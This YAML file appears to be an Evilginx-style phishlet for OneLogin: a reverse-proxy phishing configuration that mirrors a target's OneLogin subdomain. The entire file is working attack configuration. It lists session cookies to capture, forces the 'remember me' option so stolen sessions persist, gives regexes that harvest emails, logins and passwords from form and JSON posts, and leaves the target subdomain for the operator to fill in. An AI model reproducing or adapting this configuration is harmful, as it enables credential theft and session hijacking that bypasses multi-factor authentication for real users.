name: 'onelogin'
author: '@perfectlylogical'
min_ver: '2.3.0'
# NOTE: Do not forget to change EXMAPLE to the relevant sub domain.
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: 'onelogin.com', session: false, is_landing: false }
  - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'onelogin.com', session: true, is_landing: true}
  - {phish_sub: 'portal-cdn', orig_sub: 'portal-cdn', domain: 'onelogin.com', session: false, is_landing: false}
  # Uncomment this line if the target is using the default CSS for onelogin. Will manifest as the login page not loading.
  #- {phish_sub: 'web-login-cdn', orig_sub: 'web-login-cdn', domain: 'onelogin.com', session: false, is_landing: false}
sub_filters: []
auth_tokens:
  - domain: '.onelogin.com'
    keys: ['onelogin.com_user']
  - domain: 'EXAMPLE.onelogin.com'
    keys: ['sub_session_onelogin.com']
auth_urls:
 - '/portal/'
 - '/client/apps'
# This is used to force the rememebr me functionality if the target is using the /login url
# This method will not work if they are using the multistep login method on the /login2 url  
force_post:
  - path: '/sessions'
    search:
      - {key: 'authenticity_token', search: '.*'}
      - {key: 'email', search: '.*'}
      - {key: 'password', search: '.*'}
    force:
      - {key: 'persist_session', value: 'true'}
    type: 'post'
# The post type is used to capture credentials which use the /login url
# The json type is used to capture credentials which use the /login2 url
credentials:
  username:
    key: 'email'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
  username:
    key: 'login'
    search: '"login":"(.*)"'
    type: 'json'
  password:
    key: 'password'
    search: '"password":"(.*)",'
    type: 'json'
login:
  domain: 'EXAMPLE.onelogin.com'
  path: '/login'